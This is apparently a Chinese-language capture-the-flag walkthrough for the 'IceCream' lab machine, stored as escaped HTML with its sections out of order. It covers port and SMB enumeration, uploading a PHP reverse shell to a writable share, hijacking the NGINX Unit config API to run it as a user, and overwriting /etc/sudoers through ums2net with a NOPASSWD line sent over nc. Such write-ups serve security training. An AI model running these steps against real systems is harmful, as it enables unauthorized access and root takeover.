Each line in the config file maps a TCP port to a device. All the options are separated by space. The first argument is a number represents the TCP port. And the rest of the arguments are in dd-style. For example,<\/p>\n
A line in the config file:<\/p>\n
\"29543 of=\/dev\/disk\/by-id\/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096\"<\/code><\/pre>\nIt means TCP port 29543 is mapped to \/dev\/disk\/by-id\/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 and the block size is 4096.<\/p>\n
Currently we only support "of" and "bs".<\/p>\n<\/blockquote>\n
\u5199\u7684\u662fUSB\u901a\u8fc7tcp\u5171\u4eab\u6570\u636e\uff0c\u5c1d\u8bd5\u53cd\u8fc7\u6765\u8fdb\u884c\u4fee\u6539\u4e00\u4e0bsudoers<\/code>\u6587\u4ef6\uff1a<\/p>\necho "1234 of=\/etc\/sudoers bs=4096" > config\nsudo \/usr\/sbin\/ums2net -c config -d<\/code><\/pre>\n\u7136\u540e\u672c\u5730\u901a\u8fc7nc\u4f20\u8fc7\u53bb\u5c31\u884c\u4e86\uff1a<\/p>\n
echo 'ice ALL=(ALL) NOPASSWD: ALL' |nc $IP 1234<\/code><\/pre>\n<\/div><\/p>\n\u62ff\u4e0broot\u3002<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/blog.findtodd.com\/2024\/10\/09\/hmv-Icecream<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:139\nOpen 192.168.10.101:445\nOpen 192.168.10.101:9000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)\n| ssh-hostkey: \n| 256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOo0aMrFKUdos1+tMkValDaSFRx0lOy7VE4akDQlO9DGQDNT0aT5JCXm9jcgHk7mne7bxPG2jUBms8n2O1iQNyI=\n| 256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPDdtb0wbP+\/g4yk5RfteqQ3ho372gC6QdawREJ+y9Eb\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: 403 Forbidden\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n|_http-server-header: nginx\/1.22.1\n139\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n9000\/tcp open cslistener? syn-ack\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Server: Unit\/1.33.0\n| Date: Wed, 09 Oct 2024 07:17:15 GMT\n| Content-Type: application\/json\n| Content-Length: 40\n| Connection: close\n| "error": "Value doesn't exist."\n| GetRequest: \n| HTTP\/1.1 200 OK\n| Server: Unit\/1.33.0\n| Date: Wed, 09 Oct 2024 07:17:15 GMT\n| Content-Type: application\/json\n| Content-Length: 1042\n| Connection: close\n| "certificates": {},\n| "js_modules": {},\n| "config": {\n| "listeners": {},\n| "routes": [],\n| "applications": {}\n| "status": {\n| "modules": {\n| "python": {\n| "version": "3.11.2",\n| "lib": "\/usr\/lib\/unit\/modules\/python3.11.unit.so"\n| "php": {\n| "version": "8.2.18",\n| "lib": "\/usr\/lib\/unit\/modules\/php.unit.so"\n| "perl": {\n| "version": "5.36.0",\n| "lib": "\/usr\/lib\/unit\/modules\/perl.unit.so"\n| "ruby": {\n| "version": "3.1.2",\n| "lib": "\/usr\/lib\/unit\/modules\/ruby.unit.so"\n| "java": {\n| "version": "17.0.11",\n| "lib": "\/usr\/lib\/unit\/modules\/java17.unit.so"\n| "wasm": {\n| "version": "0.1",\n| "lib": "\/usr\/lib\/unit\/modules\/wasm.unit.so"\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Server: Unit\/1.33.0\n| Date: Wed, 09 Oct 2024 07:17:15 GMT\n| Content-Type: application\/json\n| Content-Length: 35\n| Connection: close\n|_ "error": "Invalid method."\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port9000-TCP:V=7.94SVN%I=7%D=10\/9%Time=67062DF9%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,4A8,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Unit\/1\\.33\\.0\\r\\n\nSF:Date:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\nContent-Type:\\\nSF:x20application\/json\\r\\nContent-Length:\\x201042\\r\\nConnection:\\x20close\\\nSF:r\\n\\r\\n{\\r\\n\\t\\"certificates\\":\\x20{},\\r\\n\\t\\"js_modules\\":\\x20{},\\r\\n\\\nSF:t\\"config\\":\\x20{\\r\\n\\t\\t\\"listeners\\":\\x20{},\\r\\n\\t\\t\\"routes\\":\\x20\\[\nSF:\\],\\r\\n\\t\\t\\"applications\\":\\x20{}\\r\\n\\t},\\r\\n\\r\\n\\t\\"status\\":\\x20{\\r\\\nSF:n\\t\\t\\"modules\\":\\x20{\\r\\n\\t\\t\\t\\"python\\":\\x20{\\r\\n\\t\\t\\t\\t\\"version\\"\nSF::\\x20\\"3\\.11\\.2\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/modules\/pytho\nSF:n3\\.11\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"php\\":\\x20{\\r\\n\\t\\t\\t\\t\\"\nSF:version\\":\\x20\\"8\\.2\\.18\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/modu\nSF:les\/php\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"perl\\":\\x20{\\r\\n\\t\\t\\t\\t\nSF:\\"version\\":\\x20\\"5\\.36\\.0\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/mo\nSF:dules\/perl\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"ruby\\":\\x20{\\r\\n\\t\\t\\\nSF:t\\t\\"version\\":\\x20\\"3\\.1\\.2\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/\nSF:modules\/ruby\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"java\\":\\x20{\\r\\n\\t\\\nSF:t\\t\\t\\"version\\":\\x20\\"17\\.0\\.11\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/u\nSF:nit\/modules\/java17\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"wasm\\":\\x20{\\\nSF:r\\n\\t\\t\\t\\t\\"version\\":\\x20\\"0\\.1\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/\nSF:unit\/modules\/wasm\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t")%r(HTTPOptions,C\nSF:7,"HTTP\/1\\.1\\x20405\\x20Method\\x20Not\\x20Allowed\\r\\nServer:\\x20Unit\/1\\.3\nSF:3\\.0\\r\\nDate:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\nConten\nSF:t-Type:\\x20application\/json\\r\\nContent-Length:\\x2035\\r\\nConnection:\\x20\nSF:close\\r\\n\\r\\n{\\r\\n\\t\\"error\\":\\x20\\"Invalid\\x20method\\.\\"\\r\\n}\\r\\n")%r(\nSF:FourOhFourRequest,C3,"HTTP\/1\\.1\\x20404\\x20Not\\x20Found\\r\\nServer:\\x20Un\nSF:it\/1\\.33\\.0\\r\\nDate:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\\nSF:nContent-Type:\\x20application\/json\\r\\nContent-Length:\\x2040\\r\\nConnecti\nSF:on:\\x20close\\r\\n\\r\\n{\\r\\n\\t\\"error\\":\\x20\\"Value\\x20doesn't\\x20exist\\.\\\nSF:"\\r\\n}\\r\\n");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n| smb2-time: \n| date: 2024-10-09T07:17:16\n|_ start_date: N\/A\n|_clock-skew: 1s\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 16534\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 30933\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 19523\/udp): CLEAN (Failed to receive data)\n| Check 4 (port 16915\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)\n| Names:\n| ICECREAM<00> Flags: <unique><active>\n| ICECREAM<03> Flags: <unique><active>\n| ICECREAM<20> Flags: <unique><active>\n| \\x01\\x02__MSBROWSE__\\x02<01> Flags: <group><active>\n| WORKGROUP<00> Flags: <group><active>\n| WORKGROUP<1d> Flags: <unique><active>\n| WORKGROUP<1e> Flags: <group><active>\n| Statistics:\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.101\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 6988 \/ 441122 (1.58%)[ERROR] Get "http:\/\/192.168.10.101\/sed.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 23352 \/ 441122 (5.29%)[ERROR] Get "http:\/\/192.168.10.101\/Real_Estate": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.101\/growth.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.101\/2488": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 28289 \/ 441122 (6.41%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 28323 \/ 441122 (6.42%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/192.168.10.101 [403 Forbidden] Country[RESERVED][ZZ], HTTPServer[nginx\/1.22.1], IP[192.168.10.101], Title[403 Forbidden], nginx[1.22.1]<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl http:\/\/192.168.10.101:9000\/\n{\n "certificates": {},\n "js_modules": {},\n "config": {\n "listeners": {},\n "routes": [],\n "applications": {}\n },\n\n "status": {\n "modules": {\n "python": {\n "version": "3.11.2",\n "lib": "\/usr\/lib\/unit\/modules\/python3.11.unit.so"\n },\n\n "php": {\n "version": "8.2.18",\n "lib": "\/usr\/lib\/unit\/modules\/php.unit.so"\n },\n\n "perl": {\n "version": "5.36.0",\n "lib": "\/usr\/lib\/unit\/modules\/perl.unit.so"\n },\n\n "ruby": {\n "version": "3.1.2",\n "lib": "\/usr\/lib\/unit\/modules\/ruby.unit.so"\n },\n\n "java": {\n "version": "17.0.11",\n "lib": "\/usr\/lib\/unit\/modules\/java17.unit.so"\n },\n\n "wasm": {\n "version": "0.1",\n "lib": "\/usr\/lib\/unit\/modules\/wasm.unit.so"\n },\n\n "wasm-wasi-component": {\n "version": "0.1",\n "lib": "\/usr\/lib\/unit\/modules\/wasm_wasi_component.unit.so"\n }\n },\n\n "connections": {\n "accepted": 0,\n "active": 0,\n "idle": 0,\n "closed": 0\n },\n\n "requests": {\n "total": 0\n },\n\n "applications": {}\n }\n}<\/code><\/pre>\n\u654f\u611f\u7aef\u53e3\u6d4b\u8bd5<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Wed Oct 9 03:21:44 2024\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: WORKGROUP\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n ICECREAM <00> - B <ACTIVE> Workstation Service\n ICECREAM <03> - B <ACTIVE> Messenger Service\n ICECREAM <20> - B <ACTIVE> File Server Service\n ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser\n WORKGROUP <00> - <GROUP> B <ACTIVE> Domain\/Workgroup Name\n WORKGROUP <1d> - B <ACTIVE> Master Browser\n WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections\n\n MAC Address = 00-00-00-00-00-00\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[+] Server 192.168.10.101 allows sessions using username '', password ''\n\n ===============================( Getting domain SID for 192.168.10.101 )===============================\n\nDomain Name: WORKGROUP\nDomain Sid: (NULL SID)\n\n[+] Can't determine if host is part of domain or part of a workgroup\n\n ==================================( OS information on 192.168.10.101 )==================================\n\n[E] Can't get OS info with smbclient\n\n[+] Got OS info for 192.168.10.101 from srvinfo: \n ICECREAM Wk Sv PrQ Unx NT SNT Samba 4.17.12-Debian\n platform_id : 500\n os version : 6.1\n server type : 0x809a03\n\n ======================================( Users on 192.168.10.101 )======================================\n\nUse of uninitialized value $users in print at .\/enum4linux.pl line 972.\nUse of uninitialized value $users in pattern match (m\/\/) at .\/enum4linux.pl line 975.\n\nUse of uninitialized value $users in print at .\/enum4linux.pl line 986.\nUse of uninitialized value $users in pattern match (m\/\/) at .\/enum4linux.pl line 988.\n\n ================================( Share Enumeration on 192.168.10.101 )================================\n\nsmbXcli_negprot_smb1_done: No compatible protocol selected by server.\n\n Sharename Type Comment\n --------- ---- -------\n print$ Disk Printer Drivers\n icecream Disk tmp Folder\n IPC$ IPC IPC Service (Samba 4.17.12-Debian)\n nobody Disk Home Directories\nReconnecting with SMB1 for workgroup listing.\nProtocol negotiation to server 192.168.10.101 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE\nUnable to connect with SMB1 -- no workgroup available\n\n[+] Attempting to map shares on 192.168.10.101\n\n\/\/192.168.10.101\/print$ Mapping: DENIED Listing: N\/A Writing: N\/A\n\/\/192.168.10.101\/icecream Mapping: OK Listing: OK Writing: N\/A\n\n[E] Can't understand response:\n\nNT_STATUS_CONNECTION_REFUSED listing \\*\n\/\/192.168.10.101\/IPC$ Mapping: N\/A Listing: N\/A Writing: N\/A\n\/\/192.168.10.101\/nobody Mapping: DENIED Listing: N\/A Writing: N\/A\n\n ===========================( Password Policy Information for 192.168.10.101 )===========================\n\n[+] Attaching to 192.168.10.101 using a NULL share\n\n[+] Trying protocol 139\/SMB...\n\n[+] Found domain(s):\n\n [+] ICECREAM\n [+] Builtin\n\n[+] Password Info for Domain: ICECREAM\n\n [+] Minimum password length: 5\n [+] Password history length: None\n [+] Maximum password age: 37 days 6 hours 21 minutes \n [+] Password Complexity Flags: 000000\n\n [+] Domain Refuse Password Change: 0\n [+] Domain Password Store Cleartext: 0\n [+] Domain Password Lockout Admins: 0\n [+] Domain Password No Clear Change: 0\n [+] Domain Password No Anon Change: 0\n [+] Domain Password Complex: 0\n\n [+] Minimum password age: None\n [+] Reset Account Lockout Counter: 30 minutes \n [+] Locked Account Duration: 30 minutes \n [+] Account Lockout Threshold: None\n [+] Forced Log off Time: 37 days 6 hours 21 minutes \n\n[+] Retieved partial password policy with rpcclient:\n\nPassword Complexity: Disabled\nMinimum Password Length: 5\n\n ======================================( Groups on 192.168.10.101 )======================================\n\n[+] Getting builtin groups:\n\n[+] Getting builtin group memberships:\n\n[+] Getting local groups:\n\n[+] Getting local group memberships:\n\n[+] Getting domain groups:\n\n[+] Getting domain group memberships:\n\n =================( Users on 192.168.10.101 via RID cycling (RIDS: 500-550,1000-1050) )=================\n\n[I] Found new SID: \nS-1-22-1\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[+] Enumerating users using SID S-1-5-21-780586060-1811573838-1416508090 and logon username '', password ''\n\nS-1-5-21-780586060-1811573838-1416508090-501 ICECREAM\\nobody (Local User)\nS-1-5-21-780586060-1811573838-1416508090-513 ICECREAM\\None (Domain Group)\n\n[+] Enumerating users using SID S-1-5-32 and logon username '', password ''\n\nS-1-5-32-544 BUILTIN\\Administrators (Local Group)\nS-1-5-32-545 BUILTIN\\Users (Local Group)\nS-1-5-32-546 BUILTIN\\Guests (Local Group)\nS-1-5-32-547 BUILTIN\\Power Users (Local Group)\nS-1-5-32-548 BUILTIN\\Account Operators (Local Group)\nS-1-5-32-549 BUILTIN\\Server Operators (Local Group)\nS-1-5-32-550 BUILTIN\\Print Operators (Local Group)\n\n[+] Enumerating users using SID S-1-22-1 and logon username '', password ''\n\nS-1-22-1-1000 Unix User\\ice (Local User)\n\n ==============================( Getting printer info for 192.168.10.101 )==============================\n\nNo printers returned.<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ smbmap -H $IP \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s) \n\n[+] IP: 192.168.10.101:445 Name: lookup.hmv Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n print$ NO ACCESS Printer Drivers\n icecream READ, WRITE tmp Folder\n IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)\n nobody NO ACCESS Home Directories<\/code><\/pre>\n\u90fd\u663e\u793a\u6709\u4e00\u4e2a\u53ef\u8bfb\u5199\u76ee\u5f55\uff01\u524d\u9762\u7684\u57df\u540d\u89e3\u6790\u5fd8\u4e86\u5220\u6389\u4e86\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ nbtscan $IP \nDoing NBT name scan for addresses from 192.168.10.101\n\nIP address NetBIOS Name Server User MAC address \n------------------------------------------------------------------------------\n192.168.10.101 ICECREAM <server> ICECREAM 00:00:00:00:00:00<\/code><\/pre>\n\u4ee5\u53ca9000<\/code>\u7aef\u53e3\u7684\u6d4b\u8bd5\uff1a<\/p>\nhttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi<\/a><\/p>\n\u4ee5\u53ca https:\/\/gist.github.com\/phith0n\/9615e2420f31048f7e30f3937356cf75<\/a> <\/p>\n\u4f46\u662f\u672a\u679c\uff0c\u67e5\u8be2\u4e00\u4e0b\uff0c\u53d1\u73b0\u662f\uff1a<\/p>\n
<\/div><\/p>\n\u767b\u5f55smb<\/h3>\n
\u767b\u5f55\u4ee5\u540e\u5c1d\u8bd5\u53cd\u5f39shell\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ vim revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ ls -la\ntotal 28\ndrwxr-xr-x 2 kali kali 4096 Oct 9 03:46 .\ndrwxr-xr-x 136 kali kali 4096 Oct 9 02:52 ..\n-rw-r--r-- 1 kali kali 8575 Oct 9 03:37 exp.py\n-rwxr-xr-x 1 kali kali 492 Oct 9 03:35 exp.sh\n-rw-r--r-- 1 kali kali 3912 Oct 9 03:46 revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ chmod +x revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ smbclient \/\/$IP\/ICECREAM -U ICECREAM\nPassword for [WORKGROUP\\ICECREAM]:\nTry "help" to get a list of possible commands.\nsmb: \\> dir\n . D 0 Wed Oct 9 03:39:01 2024\n .. D 0 Sun Oct 6 06:06:38 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC D 0 Wed Oct 9 03:15:49 2024\n .font-unix DH 0 Wed Oct 9 03:15:48 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f D 0 Wed Oct 9 03:15:48 2024\n .XIM-unix DH 0 Wed Oct 9 03:15:48 2024\n .ICE-unix DH 0 Wed Oct 9 03:15:48 2024\n .X11-unix DH 0 Wed Oct 9 03:15:48 2024\n\n 19480400 blocks of size 1024. 16156948 blocks available\nsmb: \\> pwd\nCurrent directory is \\\\192.168.10.101\\ICECREAM\\\nsmb: \\> help\n? allinfo altname archive backup \nblocksize cancel case_sensitive cd chmod \nchown close del deltree dir \ndu echo exit get getfacl \ngeteas hardlink help history iosize \nlcd link lock lowercase ls \nl mask md mget mkdir \nmore mput newer notify open \nposix posix_encrypt posix_open posix_mkdir posix_rmdir \nposix_unlink posix_whoami print prompt put \npwd q queue quit readlink \nrd recurse reget rename reput \nrm rmdir showacls setea setmode \nscopy stat symlink tar tarmode \ntimeout translate unlock volume vuid \nwdel logon listconnect showconnect tcon \ntdis tid utimes logoff .. \n! \nsmb: \\> put revshell.php \nputting file revshell.php as \\revshell.php (764.0 kb\/s) (average 764.1 kb\/s)\nsmb: \\> ls\n . D 0 Wed Oct 9 03:47:43 2024\n .. D 0 Sun Oct 6 06:06:38 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC D 0 Wed Oct 9 03:15:49 2024\n .font-unix DH 0 Wed Oct 9 03:15:48 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f D 0 Wed Oct 9 03:15:48 2024\n .XIM-unix DH 0 Wed Oct 9 03:15:48 2024\n .ICE-unix DH 0 Wed Oct 9 03:15:48 2024\n .X11-unix DH 0 Wed Oct 9 03:15:48 2024\n revshell.php A 3912 Wed Oct 9 03:47:43 2024\n\n 19480400 blocks of size 1024. 16156944 blocks available<\/code><\/pre>\n\u7136\u540e\u8bbf\u95ee\u6fc0\u6d3b\u4e00\u4e0b\u5373\u53ef\uff01<\/p>\n
http:\/\/192.168.10.101\/revshell.php<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@icecream:\/$ cd \/var\/tmp\n(remote) www-data@icecream:\/var\/tmp$ wget http:\/\/192.168.10.102:8888\/linpeas.sh\n(remote) www-data@icecream:\/var\/tmp$ wget http:\/\/192.168.10.102:8888\/pspy64\n(remote) www-data@icecream:\/var\/tmp$ chmod +x *<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u5565\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n<\/div><\/p>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u6dfb\u52a0\u8def\u7531\u76d1\u542c\u63d0\u6743ice<\/h3>\n
Todd<\/code>\u5e08\u5085\u627e\u5230\u4e86\u4e00\u4e2a\u52a0\u8def\u7531\u7684\u529e\u6cd5\uff01\u5c1d\u8bd5\u6309\u56fe\u7d22\u9aa5\u4e00\u4e0b\uff01<\/p>\n<\/div><\/p>\n\u53d1\u73b0\u5b58\u5728\u4f7f\u7528PUT\u8fdb\u884c\u66f4\u65b0\u7684\u529e\u6cd5\uff1a<\/p>\n
<\/div><\/p>\n\u6839\u636e\u5b98\u7f51\u4e0b\u9762\u7684\u6837\u4f8b\uff0c\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6\u4e0a\u4f20\uff1a<\/p>\n
{\n "listeners": {\n "127.0.0.1:8080": {\n "pass": "routes"\n }\n },\n\n "routes": [\n {\n "action": {\n "share": "\/tmp\/revshell.php",\n "pass": "applications\/shellapp"\n }\n }\n ],\n "applications": {\n "shellapp": {\n "type": "php",\n "user": "\/tmp",\n "index": "revshell.php",\n "script": "revshell.php"\n }\n }\n}<\/code><\/pre>\n\u7136\u540e\u62a5\u9519\u4e86\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u73b0\u5c1d\u8bd5\u4f7f\u7528\u4e4b\u524d\u7684\u6743\u9650\uff0c\u8c03\u6574\u4e86\u4e00\u4e0b\uff0c\u5148\u4f7f\u7528\u4e4b\u524d\u7684\u6743\u9650\u5199\u5165\u7684shell\uff0c\u518d\u4f20\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
<\/div><\/p>\n{\n "listeners": {\n "127.0.0.1:8080": {\n "pass": "routes"\n }\n },\n\n "routes": [\n {\n "action": {\n "pass": "applications\/shellapp"\n }\n }\n ],\n "applications": {\n "shellapp": {\n "type": "php",\n "user": "\/tmp",\n "index": "revshell.php",\n "script": "revshell.php"\n }\n }\n}<\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl -X PUT --data-binary @shell.json http:\/\/192.168.10.102:9000\/config\n{\n "error": "Invalid configuration.",\n "detail": "Required parameter \\"root\\" is missing."\n}<\/code><\/pre>\n\u518d\u6b21\u4fee\u6539\uff1a<\/p>\n
{\n "listeners": {\n "127.0.0.1:8080": {\n "pass": "routes"\n }\n },\n\n "routes": [\n {\n "action": {\n "pass": "applications\/shellapp"\n }\n }\n ],\n "applications": {\n "shellapp": {\n "type": "php",\n "root": "\/tmp",\n "index": "revshell.php",\n "script": "revshell.php"\n }\n }\n}<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl -X PUT --data-binary @shell.json http:\/\/192.168.10.102:9000\/config\n{\n "success": "Reconfiguration done."\n}<\/code><\/pre>\n\u7136\u540e\u65e0\u6cd5\u8bbf\u95ee\uff0c\u91cd\u542f\uff0c\u91cd\u65b0\u4e0a\u4f20shell\uff0c\u8c03\u6574\u4e86\u4e00\u4e0b\uff0c\u62ff\u4e0buser\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u63d0\u6743root<\/h3>\n
<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u662f\u5565\uff1a<\/p>\n
\nUSB Mass Storage to Network Proxy (ums2net)<\/h1>\n
ums2net provides a way for a user to connect from a network connection to a USB mass storage device.<\/p>\n
